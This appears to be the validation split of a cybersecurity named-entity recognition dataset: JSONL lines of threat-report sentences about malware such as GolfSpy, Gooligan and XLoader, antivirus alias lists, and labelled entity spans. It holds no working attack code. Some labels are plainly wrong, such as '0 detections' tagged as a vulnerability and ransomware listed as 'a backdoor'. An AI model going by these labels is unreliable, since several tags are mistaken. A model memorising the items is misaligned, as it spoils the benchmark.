{"text": "A backdoor also known as: Backdoor.Miancha W64/Backdoor.CUSF-5718 Backdoor.Miancha BKDR64_GRECOM.CA Backdoor.Win32.Miancha.c Trojan.Win64.Miancha.cuslax BackDoor.Miancha.2 Backdoor.Miancha.Win32.1 BKDR64_GRECOM.CA Backdoor/Miancha.d BDS/Miancha.A.6 Backdoor.Win32.Miancha.c Backdoor:Win64/Miancha.A Trojan/Win64.Miancha.C256051 Trj/CI.A Win32.Backdoor.Miancha.Dyqu Backdoor.Miancha! Win32/Backdoor.071", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000844", "source": "cyner2_valid"}}
{"text": "However , the C2 can send an updated list .", "spans": {}, "info": {"id": "cyner2_valid_000845", "source": "cyner2_valid"}}
{"text": "A backdoor targetting Linux also known as: Backdoor.Linux.Shellshock.A ELF_BASHLITE.SMC HEUR:Backdoor.Linux.Gafgyt.b Trojan.Unix.Gafgyt.eikqfj Backdoor.Linux.Gafgyt!c Linux.BackDoor.Fgt.46 ELF_BASHLITE.SMC Linux/Gafgyt.f ELF/Trojan.EEEF-7 Backdoor.Linux.anbf LINUX/Gafgyt.qsqxq Trojan[Backdoor]/Linux.Gafgyt.b Backdoor:Linux/Shellshock.A HEUR:Backdoor.Linux.Gafgyt.b Linux/Gafgyt.f Trojan.Linux.Gafgyt.f Trojan.Linux.Gafgyt ELF/Gafgyt.WN!tr.bdr Win32/Trojan.Flooder.c6e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000846", "source": "cyner2_valid"}}
{"text": "Older samples connecting to eSurv Finally , Google shared with us some older samples of Exodus One ( with hashes 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f and a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f ) which are not obfuscated and use the following disguise : The configuration of these older samples is very similar to newer ones , but it provides additional insights being not obfuscated : Firstly we can notice that , instead of generic domain names or IP addresses , these samples communicated with a Command & Control server located at attiva.exodus.esurv [ .", "spans": {"Organization: eSurv": [[28, 33]], "Organization: Google": [[44, 50]], "Malware: Exodus One": [[88, 98]]}, "info": {"id": "cyner2_valid_000848", "source": "cyner2_valid"}}
{"text": "There have been recent reports 1, 2 about a new version of one such commodity RAT, H-W0rm Hworm, and the various campaigns it is being used in.", "spans": {"Malware: RAT, H-W0rm Hworm,": [[78, 96]]}, "info": {"id": "cyner2_valid_000849", "source": "cyner2_valid"}}
{"text": "Here is a list of information that GolfSpy steals : Device accounts List of applications installed in the device Device ’ s current running processes Battery status Bookmarks/Histories of the device ’ s default browser Call logs and records Clipboard contents Contacts , including those in VCard format Mobile operator information Files stored on SDcard Device location List of image , audio , and video files stored on the device Storage and memory information Connection information Sensor information SMS messages Pictures GolfSpy also has a function that lets it connect to a remote server to fetch and perform commands , including : searching for , listing , deleting , and renaming files as well as downloading a file into and retrieving a file from the device ; taking screenshots ; installing other application packages ( APK ) ; recording audio and video ; and updating the malware .", "spans": {"Malware: GolfSpy": [[35, 42], [526, 533]]}, "info": {"id": "cyner2_valid_000850", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Dunsenr.MUE.B4 Trojan.Heur.emKfrzyHlQmbh Win32.Trojan.Kryptik.gp W32/Trojan-Gypikon-based.BA!Max Backdoor.Trojan Trojan.Win32.PolyCrypt.dpmiea TrojWare.Win32.Amtar.MUVP BackDoor.PcClient.6500 Backdoor.Win32.Dunsenr W32/Trojan-Gypikon-based.BA!Max W32.Worm.Morto.E Backdoor:Win32/Dunsenr.B Trojan/Win32.1Table.R120825 Backdoor.Win32.Dunsenr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000851", "source": "cyner2_valid"}}
{"text": "Proofpoint researchers analyzed the activity in the recent return to operations of the Dridex actors and identified numerous changes in behavior, from technical innovations to distributing other banking and data-stealing malware.", "spans": {"Organization: Proofpoint researchers": [[0, 22]], "Malware: banking and data-stealing malware.": [[195, 229]]}, "info": {"id": "cyner2_valid_000853", "source": "cyner2_valid"}}
{"text": "WannaCry ransomware's outbreak during the weekend was mitigated by having its kill switch domain registered.", "spans": {"Malware: WannaCry ransomware's": [[0, 21]]}, "info": {"id": "cyner2_valid_000854", "source": "cyner2_valid"}}
{"text": "After achieving root access , Gooligan downloads a new , malicious module from the C & C server and installs it on the infected device .", "spans": {"Malware: Gooligan": [[30, 38]]}, "info": {"id": "cyner2_valid_000856", "source": "cyner2_valid"}}
{"text": "In these campaigns, though, Kronos acted as a loader with a new Point-of-Sale POS malware dubbed ScanPOS as the secondary payload.", "spans": {"Malware: Kronos": [[28, 34]], "Malware: Point-of-Sale POS malware": [[64, 89]], "Malware: ScanPOS": [[97, 104]], "Malware: secondary payload.": [[112, 130]]}, "info": {"id": "cyner2_valid_000858", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.Scar!O Worm.Racvacs.AA2 W32/Autorun.worm.bbx Trojan/AutoRun.IRCBot.ef TSPY_RACVACS_BH0800EE.TOMC Win32.Trojan.IRCBot.b W32.SillyFDC TSPY_RACVACS_BH0800EE.TOMC Trojan.Win32.Scar.gxqcq Troj.W32.Cosmu.ldLk Worm.Win32.Autorun.lbe Win32.HLLW.Autoruner.57283 Trojan.Scar.Win32.42023 BehavesLike.Win32.StartPage.lm Trojan-Downloader.Win32.Busky Trojan/Win32.Scar Worm:Win32/Racvacs.A Trojan.Win32.A.Scar.17430 Trojan/Win32.Scar.C44140 BScope.Trojan-Spy.Zbot W32/Scar.DGXM!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000859", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.Inject.xhfk W32/Trojan2.GJSY W32.IRCBot Win32/Tnega.Q Win32.Trojan Trojan.Win32.Inject.azob Trojan.Inject!v0uuxT5SLxE Trojan.Win32.Crypt.15872.B Win32.HLLW.Autoruner.6398 TR/Inject.azob Trojan/Inject.doq Worm:Win32/Synigh.A Win32/Aimbot.worm.15872 W32/Trojan2.GJSY Trojan.IRCBot!rem Backdoor.IRCbot!32EF Exploit.Win32.MS08067 W32/Inject.RQ!tr W32/Maimbot.A.worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000861", "source": "cyner2_valid"}}
{"text": "The information collected by the malware and the control over the victim 's mobile device allows their operators to perform more complex social engineering attacks .", "spans": {}, "info": {"id": "cyner2_valid_000862", "source": "cyner2_valid"}}
{"text": "While you may have it running in your environment, you may not be familiar with its workings to provide adequate incident response when the time come.", "spans": {}, "info": {"id": "cyner2_valid_000864", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/Kheagol.c PUA.Packed.PECompact-1 Crypt.RFZ", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000866", "source": "cyner2_valid"}}
{"text": "So, let us explain in detail how Switcher performs its brute-force attacks, gets into the routers and undertakes its DNS-hijack.", "spans": {"System: Switcher": [[33, 41]], "System: routers": [[90, 97]]}, "info": {"id": "cyner2_valid_000867", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Dovs Troj.W32.Dovs!c Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_HPEMOTET.SMF3 Win.Trojan.Emotet-6443311-0 Trojan.Win32.Dovs.jel Trojan.Win32.Dovs.extnjp Trojan.Win32.Z.Ser.126976.V Trojan.Dovs.Win32.3111 BehavesLike.Win32.Rootkit.ch TR/Crypt.ZPACK.ouwws Trojan/Win32.Dovs Trojan:Win32/Kuoerl.A Trojan.Ser.Razy.1 Trojan.Win32.Dovs.jel Trj/RnkBend.A Win32.Trojan.Dovs.Wvay Trojan-Banker.Emotet W32/Kryptik.GBTT!tr Win32/Trojan.1ce", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000868", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: JS:Trojan.Crypt.PN Script-VBS/W32.RAA JS:Trojan.Crypt.PN JS.RansomRAA JS/Filecoder.RAA.A Ransom_JSRAA.A Trojan-Ransom.JS.RaaCrypt.b JS:Trojan.Crypt.PN Trojan.Script.Heuristic-js.iacgm Js.Trojan.Raacrypt.Stua JS:Trojan.Crypt.PN Trojan:JS/CryptoRa.A JS.Muldrop.138 Ransom_JSRAA.A Trojan.CKFD-9 Trojan.JS.fkn JS/RaaLocker.A Ransom:JS/CryptoRaa.A Trojan-Ransom.JS.RaaCrypt.b JS:Trojan.Crypt.PN Trojan-Ransom.Script.Raa JS/Ransom.RAA!tr js.url.downloader.n", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000869", "source": "cyner2_valid"}}
{"text": "Extract logs from Facebook Messenger conversations .", "spans": {"System: Facebook Messenger": [[18, 36]]}, "info": {"id": "cyner2_valid_000874", "source": "cyner2_valid"}}
{"text": "This also has a jrat java.jar file attachment so trying to give you a double blow.", "spans": {}, "info": {"id": "cyner2_valid_000875", "source": "cyner2_valid"}}
{"text": "In the past , XLoader showed the ability to mine cryptocurrency on PCs and perform account phishing on iOS devices .", "spans": {"Malware: XLoader": [[14, 21]], "System: iOS": [[103, 106]]}, "info": {"id": "cyner2_valid_000876", "source": "cyner2_valid"}}
{"text": "The attack campaign , named Gooligan , breached the security of over one million Google accounts .", "spans": {"Malware: Gooligan": [[28, 36]], "Organization: Google": [[81, 87]]}, "info": {"id": "cyner2_valid_000877", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.OnGameT2KSULAE.Trojan Abuse-Worry/W32.PasswordRecovery.3325952 PSWTool.W32.PasswordRecovery.af!c TROJ_INFOSTL.SMP Infostealer.Viwir TROJ_INFOSTL.SMP not-a-virus:PSWTool.Win32.PasswordRecovery.af TrojWare.Win32.Spy.Zbot.BPOE BehavesLike.Win32.PWSZbot.wc Trojan-PWS.Win32.Deka Trojan.Strictor.D6C0E PWS:Win32/Fotip.B Trojan/Win32.HDC.C171142 Trojan.Strictor!oEy39iPnn7k", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000878", "source": "cyner2_valid"}}
{"text": "Targets The initial version of Ginp had a generic credit card grabber overlay screen used for all targeted applications .", "spans": {"Malware: Ginp": [[31, 35]]}, "info": {"id": "cyner2_valid_000880", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Itaduke!u7PVM40U470 W32/Injector.HG Trojan.Swaylib Injector.DGQL TROJ_INJECT.CPX Backdoor.Win32.Itaduke.g Trojan.Win32.Itaduke.btxwlc TROJ_INJECT.CPX W32/Injector.ISUC-1784 Backdoor/Itaduke.b TR/Injector.anz Trojan[Backdoor]/Win32.Itaduke Exploit:Win32/SandyEva.A Win-Trojan/Itaduke.250880 Backdoor.Itaduke Dialer.EMN Win32/SandyEva.A Win32.Backdoor.Itaduke.Htvr Backdoor.Win32.Itaduke W32/Itaduke.C!tr.bdr Backdoor.Win32.Itaduke.API Win32/Backdoor.092", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000881", "source": "cyner2_valid"}}
{"text": "The email address used for registering the domains was anonymized.", "spans": {}, "info": {"id": "cyner2_valid_000882", "source": "cyner2_valid"}}
{"text": "Today, we're bringing you news about Win32/Spy.Odlanor, which is used by its malware operator to cheat in online poker by peeking at the cards of infected opponents.", "spans": {}, "info": {"id": "cyner2_valid_000883", "source": "cyner2_valid"}}
{"text": "It also clears event logs and the file system journals.", "spans": {}, "info": {"id": "cyner2_valid_000884", "source": "cyner2_valid"}}
{"text": "At this point, we re only seeing tech support scams and HoeflerText popups from the EITest campaign.", "spans": {"Malware: HoeflerText": [[56, 67]]}, "info": {"id": "cyner2_valid_000885", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: PDF:Exploit.PDF-JS.AAH JS/Pdfka.MC Pdfka.CK PDF:Exploit.PDF-JS.AAH Exploit.Script.Pdfka.btvxj PDF:Exploit.PDF-JS.AAH Exploit.JS.Pidief.FD Exploit:W32/CVE-2010-0188.C Exploit.PDF.5584 EXP/Pidief.ehw PDF:Exploit.PDF-JS.AAH JS/Pdfka.MC JS/Exploit.Pdfka.QJQ PDF:Attention.APT-Bait.OddDocument/RDM!5.38 Exploit.JS.CVE-2010-0806 PDF/Pdfka.QGZ!exploit Script/PDF.Exploit", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000886", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Exploit/W32.Pidief.13485.GJ Exploit.IphoneOS.Pdfka.a!c PDF/Trojan.MJNQ-6 Bloodhound.Exploit.351 PDF/Exploit.Pidief.OYE TROJ_PIDIEF.HLA Win.Exploit.Jailbreak-1 Exploit.IphoneOS.Pdfka.a Exploit.Pdf.Pdfka.lkpfs PDF.Z.EXPLOIT.13485.B[h] Exploit:W32/Pidief.CRM Exploit.PDF.2409 TROJ_PIDIEF.HLA EXP/Pdfka.BQ.1 PDF/Jailbreak.CFF!exploit.CVE20101797 Exploit.IphoneOS.Pdfka.a Exploit:iPhoneOS/Pidief.A Pdf.Exploit.Pdfka.Wtod Trojan.PDF.Exploit Exploit_c.JJY Win32/Trojan.Exploit.052", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000887", "source": "cyner2_valid"}}
{"text": "Those permission shown in bold below are the most problematic : Allows an application to write to external storage .", "spans": {}, "info": {"id": "cyner2_valid_000888", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win.Trojan.13288566-1 BehavesLike.Win32.Downloader.vz Trojan.Spy APPL/Yileyoo.olde TrojanDownloader:Win32/Potukorp.A Trojan/Win32.Potukorp.R189768 Trojan.Zusy.D2B86C Win32/Trojan.Downloader.b45", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000889", "source": "cyner2_valid"}}
{"text": "Although our primary concern at the time was with the malicious Wellpoint/Anthem and VAE, Inc.", "spans": {"Organization: Wellpoint/Anthem": [[64, 80]], "Organization: VAE, Inc.": [[85, 94]]}, "info": {"id": "cyner2_valid_000890", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9978 Trojan.Win32.Sumserv.f Trojan.Win32.DownLoad2.djega Trojan.DownLoad2.34618 TrojanDownloader:Win32/Deewomz.A Trojan.Win32.Sumserv.f", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000891", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.Virut.G W32/Downldr2.HKUH W32.Virut.CF W32/Virut.DB_2 Win32/Virut.17408 PE_VIRUX.J Virus.Win32.Virut.ce Virus.Win32.Virut.Ce Win32.Virut.56 PE_VIRUX.J Trojan-Downloader.Win32.Snilis!IK Win32/Virut.bn TrojanDownloader:Win32/Snilis.B Win32.Virut.AM W32/Downldr2.HKUH Win32/Virut.F Virus.Virut.09 Malware.Virut Win32/Virut.NBU Trojan-Downloader.Win32.Snilis W32/Virut.CE W32/Sality.AO", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000892", "source": "cyner2_valid"}}
{"text": "Users can see a “ Profile Downloaded ” added in their settings ( this feature is in iOS 12.2 , but not on iOS 12.1.1 ) .", "spans": {"System: iOS 12.2": [[84, 92]], "System: iOS 12.1.1": [[106, 116]]}, "info": {"id": "cyner2_valid_000895", "source": "cyner2_valid"}}
{"text": "It will appear differently to users depending on the language set on the device .", "spans": {}, "info": {"id": "cyner2_valid_000896", "source": "cyner2_valid"}}
{"text": "The malware , dubbed “ Judy ” , is an auto-clicking adware which was found on 41 apps developed by a Korean company .", "spans": {"Malware: Judy": [[23, 27]]}, "info": {"id": "cyner2_valid_000897", "source": "cyner2_valid"}}
{"text": "MacDownloader strangely attempts to pose as both an installer for Adobe Flash, as well as the Bitdefender Adware Removal Tool, in order to extract system information and copies of OS X keychain databases.", "spans": {"Malware: MacDownloader": [[0, 13]], "System: the Bitdefender Adware Removal Tool,": [[90, 126]], "System: OS X keychain databases.": [[180, 204]]}, "info": {"id": "cyner2_valid_000898", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.MewsSpyTTc.Worm Backdoor.Qakbot.A5 Win32.Trojan.MewsSpy.a Backdoor.Ratenjay BKDR_QAKBOT.SMW5 Trojan.Zusy.D110B6 Trojan.DownLoader10.36780 BKDR_QAKBOT.SMW5 BDS/Qakbot.335360 Trojan/Win32.Unknown Worm.Qakbot Win32/MewsSpy.A W32/MewsSpy.3678!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000899", "source": "cyner2_valid"}}
{"text": "Our research also showed that the group still uses some of the infamous PlugX malware variants—a staple in Winntis arsenal—to handle targeted attack operations via the GitHub account we identified.", "spans": {"Organization: group": [[34, 39]], "Malware: PlugX malware variants—a": [[72, 96]], "Malware: Winntis": [[107, 114]], "System: GitHub account": [[168, 182]]}, "info": {"id": "cyner2_valid_000902", "source": "cyner2_valid"}}
{"text": "At the same time , cybercriminals are reluctant to change the method of communication with the C & C server , since this would require more effort and reap less benefit than modifying the executable file .", "spans": {}, "info": {"id": "cyner2_valid_000903", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HW32.Packed.BF07 W32/Nomis.worm Trojan.Win32.Nimos-wrm.fsds W32.Nimos.Worm Win32/Nimos.A Email-Worm.Win32.Nimos I-Worm.Nimos!nQqMa/EBpWY W32.W.Nimos!c Win32.Worm-email.Nimos.Szvn Worm.Win32.Nimos.A Worm.Nimos.Win32.1 BehavesLike.Win32.Downloader.vc Worm/Nimos.a Worm[Email]/Win32.Nimos Win32/Nimos.worm.2383497 Worm:Win32/Nimos.A@mm Trojan-Spy.Win32.KeyLogger.gs I-Worm/Nimos.A Worm.Win32.Nimos.AIW", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000904", "source": "cyner2_valid"}}
{"text": "This happens all the time in regular Android apps , as Activity is one of the fundamental Android UI elements .", "spans": {"System: Android": [[37, 44], [90, 97]]}, "info": {"id": "cyner2_valid_000905", "source": "cyner2_valid"}}
{"text": "This new campaign is like the StealZilla campaign in almost every way.", "spans": {}, "info": {"id": "cyner2_valid_000906", "source": "cyner2_valid"}}
{"text": "Unfortunately , there is a specific feature of Android vulnerabilities that means it is only possible to get rid of them by receiving an update from the device manufacturers .", "spans": {}, "info": {"id": "cyner2_valid_000907", "source": "cyner2_valid"}}
{"text": "However , binding a shell on all available interfaces will obviously make it accessible to anyone who is sharing at least a local network with an infected device .", "spans": {}, "info": {"id": "cyner2_valid_000908", "source": "cyner2_valid"}}
{"text": "It is basically SMS spam : many people still follow suspicious links , install software from third-party sources , and give permissions to apps without a second thought .", "spans": {}, "info": {"id": "cyner2_valid_000909", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Flooder.1576960 Trojan.Demes Tool.Demes.Win32.1 IM-Flooder.W32.Demes.30!c Trojan/Demes.30 W32/Trojan.UOHU-7643 Win.Trojan.Demeto-1 IM-Flooder.Win32.Demes.30 Trojan.Win32.Demes.dfzh Spyware.IM-Flooder.Demes.1576960 FDOS.IM.414 Trojan.Win32.Flooder W32/TrojanX.IWN IM-Flooder.Demes.a TR/Flood.Demes.30 HackTool[Flooder]/Win32.Demes IM-Flooder.Win32.Demes.30 Win32/Flooder.Demes.30 Win32.Trojan.Demes.Eacy Malware_fam.gw Win32/Trojan.2ff", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000910", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9997 Ransom_Bartcrypt.R002C0DKR17 Ransom_Bartcrypt.R002C0DKR17 BehavesLike.Win32.Downloader.ch Ransom:Win32/Bartcrypt.A Trj/GdSda.A Trojan.Win32.Crypt Win32/Trojan.af4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000912", "source": "cyner2_valid"}}
{"text": "The purpose of this module is to extract and execute a malicious payload – the “ patch ” module .", "spans": {}, "info": {"id": "cyner2_valid_000913", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Graftor.D63597 Win32.Trojan.WisdomEyes.16070401.9500.9847 Trojan.Win32.Z.Graftor.1872384 Trojan.Win32.Nando TR/Crypt.ZPACK.gmutq Trojan:Win32/Nando.A!bit Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000914", "source": "cyner2_valid"}}
{"text": "It then continues executing in a spawned new thread that checks if there are additional undesired modules inside its own virtual address space ( for example , modules injected by certain security solutions ) .", "spans": {}, "info": {"id": "cyner2_valid_000915", "source": "cyner2_valid"}}
{"text": "This new malware – dubbed OSX/Dok — affects all versions of OSX, has 0 detections on VirusTotal as of the writing of these words, is signed with a valid developer certificate authenticated by Apple, and is the first major scale malware to target OSX users via a coordinated email phishing campaign.", "spans": {"Malware: malware": [[9, 16]], "Malware: OSX/Dok": [[26, 33]], "System: OSX,": [[60, 64]], "Vulnerability: 0 detections": [[69, 81]], "Organization: VirusTotal": [[85, 95]], "Organization: Apple,": [[192, 198]], "Malware: major scale malware": [[216, 235]], "System: OSX": [[246, 249]], "Organization: users": [[250, 255]]}, "info": {"id": "cyner2_valid_000916", "source": "cyner2_valid"}}
{"text": "In our test , this command was the value 3 .", "spans": {}, "info": {"id": "cyner2_valid_000918", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Rbot.10 Backdoor/W32.RBot.663552.I Backdoor.Win32.Rbot!O Backdoor.Rbot W32/Realbot.worm Troj.Spy.W32.Delf.mczC Win32.Trojan.WisdomEyes.16070401.9500.9970 Backdoor.IRC.Bot Backdoor.Rbot.10 Backdoor.Win32.Rbot.10 Backdoor.Rbot.10 Trojan.Win32.Rbot.wgke Backdoor.Win32.Z.Rbot.663552 Backdoor.Rbot.10 Backdoor.Win32.Rbot.10 Backdoor.Rbot.10 BackDoor.Rbot.10 Backdoor.RBot.Win32.4265 W32/Backdoor.ESMZ-1303 Backdoor/RBot.ehn Trojan[Backdoor]/Win32.Rbot Backdoor.Win32.Rbot.10 Backdoor:Win32/AXO.A Backdoor.Rbot.10 Backdoor.Rbot Bck/Sdbot.DSO Win32/Rbot.10 Win32.Backdoor.Rbot.Syrl Worm.Rbot!irHO7HQU7I4 Trojan.Win32.Rbot W32/Rbot.10!tr Win32/Backdoor.BO.e6b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000919", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Mondera.Win32.4242 Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/VBTrojan.17D1!Maximus Backdoor.Win32.Xyligan.aqjo W32.VB.lPRX Trojan.DownLoader25.46992 Virus.Win32.VBInject W32/VBTrojan.17D1!Maximus TrojanDownloader:Win32/Tecstech.A!bit Trojan.Heur.amLfcri0RzpG Backdoor.Win32.Xyligan.aqjo Trojan/Win32.Xyligan.C2274537 Win32/TrojanDownloader.VB.REP Backdoor.Xyligan!2vxzSIC2XQM", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000920", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Keytrap.A Trojan/W32.Keytrap.494592 Trojan.Win32.KeyTrap.cqpstf Trojan.Zbot Trojan-Spy.Win32.KeyTrap.0667 Trojan.Keytrap.A TrojanSpy.KeyTrap!BitwoBsZQO0 Troj.Spy.W32.KeyTrap.0667!c Trojan.Keytrap.A Trojan-Spy.Win32.KeyTrap.0667 Trojan.Keytrap.A Trojan.KeyTrap.667 Trojan.KeyTrap.Win32.3 BehavesLike.Win32.Backdoor.gm W32/Trojan.DWIV-6801 TrojanSpy.KeyTrap.a TR/Spy.Keytrap.0667 W32/KeyTrap.C!tr Trojan[Spy]/Win32.KeyTrap Trojan.Keytrap.A Trojan.Keytrap.A TrojanSpy.KeyTrap Win32.Trojan-spy.Keytrap.Srwt Backdoor.Win32.Exploiter Trojan.Keytrap.A Trojan.Win32.KeyTrap.0667", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000921", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor/W32.PcClient.97040 Backdoor.Win32.PcClient!O Trojandropper.Wkysol BackDoor-FDE.c Backdoor/PcClient.esvo BKDR_SKYIPOT.SM Trojan.ADH BKDR_SKYIPOT.SM Win.Trojan.Sykipot-11 Trojan.Win32.PcClient.sobip Backdoor.Win32.A.PcClient.1718954 Backdoor.W32.PcClient.evyq!c Application.Win32.BlkIC.IMG Trojan.Inject.55763 Backdoor.PcClient.Win32.18292 BackDoor-FDE.c Backdoor/PcClient.qga Trojan:Win32/Wisp.A TR/Drop.Wkysol.A.16 Trojan[Backdoor]/Win32.PcClient Trojan.Buzy.D10B5 TrojanDropper:Win32/Wkysol.A Trojan/Win32.PcClient.R3923 Trojan.DR.Wkysol!Xqkt2PEhr70 Trojan-Dropper.Win32.Wkysol Win32/Backdoor.325", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000923", "source": "cyner2_valid"}}
{"text": "By adding the previously calculated offset , it can get the address of the mmap function in the target process memory .", "spans": {}, "info": {"id": "cyner2_valid_000924", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.OnlineGameEPRKY.Trojan Trojan/W32.Antavmu.36864.C Trojan.Win32.Antavmu!O Trojan/Antavmu.hsb Win32.Trojan.WisdomEyes.16070401.9500.9988 W32/Trojan.KUSP-1562 Win32/KillAV.UJ TROJ_ANTIAV.SMIA Trojan.Win32.Antavmu.apjw Trojan.Win32.Antavmu.bgnnf Trojan.Win32.Antavmu.36864 Win32.Trojan.Antavmu.Dyzy TrojWare.Win32.GameThief.Magania.~NWABI Trojan.Antavmu.Win32.2547 TROJ_ANTIAV.SMIA Trojan.Win32.Antavmu W32/Trojan2.MYQF Trojan.Antavmu.bdj Trojan:Win32/Ghopog.A TR/Ghopog.A Trojan/Win32.Antavmu Trojan.Win32.Antavmu.apjw Trojan:Win32/Ghopog.A Trojan/Win32.Antavmu.R4765 Win32/Ghopog.AA Trojan.Antavmu!Ef7gP/QKiws W32/Antavmu.HSB!tr Trojan.Antavmu Win32/Trojan.2ff", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000925", "source": "cyner2_valid"}}
{"text": "For this first test, I selected 5 sets of passwords; admin/admin, guest/guest, ubnt/ubnt, cisco/cisco and ADMIN/ADMIN the last for picking up folks scanning for Supermicro IPMI devices.", "spans": {"System: Supermicro IPMI devices.": [[161, 185]]}, "info": {"id": "cyner2_valid_000926", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.AutorunHA.Trojan Win32.Worm.Fujacks.CX Win32.Worm.Fujacks.CX Trojan.MalPack.NSPack W32/Fujack.cv Win32.Worm.Fujacks.CX W32.Fujacks.E Win32/Emerleox.GT PE_FUJACKS.J Worm.Win32.Fujack.cv Win32.Worm.Fujacks.CX Trojan.Win32.HLLP.ikfyi W32.W.Fujack.lmEa Win32.Worm.Fujacks.CX Win32.Worm.Fujacks.CX Win32.HLLP.Whboy.98 PE_FUJACKS.J BehavesLike.Win32.Downloader.ch Win32.Vking.lx.5756 Virus:Win32/Viking.JB Win32.WhBoy.AZ Worm.Win32.Fujack.cv Win32.Worm.Fujacks.CX Win32/Dellboy.BA W32/Fujacks.au Virus.Win32.Fujack Win32.Fujacks Virus.Win32.Viking.a Trojan.Crypt W32/Fujacks.AU W32/P2PWorm.O Virus.Win32.Viking.AS", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000928", "source": "cyner2_valid"}}
{"text": "Indexed directories on C2 infrastructure While exfiltrated content is encrypted , information used to generate the password is plainly visible in the top level directories for each device .", "spans": {}, "info": {"id": "cyner2_valid_000929", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TrojanPWS.Sacanph.OL8 TSPY_SACANPH.SMA Win.Trojan.Delf-21318 Trojan.Win32.Delf.bcbvuf TrojWare.Win32.Delf.BCSA Trojan.Click2.62954 Dropper.Dapato.Win32.18956 TSPY_SACANPH.SMA BehavesLike.Win32.Dropper.bc Trojan/Delf.umm Trojan[Dropper]/Win32.Dapato PWS:Win32/Sacanph.A Trojan.Heur.E90F0E Dropper/Win32.Dapato.R49251 TScope.Trojan.Delf Virus.Win32.Delf.DTW", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000930", "source": "cyner2_valid"}}
{"text": "The concept of file-less malware is not a new one.", "spans": {}, "info": {"id": "cyner2_valid_000931", "source": "cyner2_valid"}}
{"text": "Technical analysis Most of this new attack ’ s routines are similar to those of the previous XLoader versions .", "spans": {"Malware: XLoader": [[93, 100]]}, "info": {"id": "cyner2_valid_000932", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Dalatar.FC.1351 Win32.Trojan.WisdomEyes.16070401.9500.9997 Backdoor:MSIL/Dalatar.A Trojan.Zusy.D1E964 Trojan.MSIL.Tixiker", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000933", "source": "cyner2_valid"}}
{"text": "We will discuss the peer-to-peer part in a future blog post.", "spans": {}, "info": {"id": "cyner2_valid_000934", "source": "cyner2_valid"}}
{"text": "Additionally, we uncovered ties between the C2 infrastructure and individuals in China active in online hacking forums that claim to work in Trojan development.", "spans": {"System: C2 infrastructure": [[44, 61]], "Organization: individuals": [[66, 77]], "Malware: Trojan development.": [[141, 160]]}, "info": {"id": "cyner2_valid_000937", "source": "cyner2_valid"}}
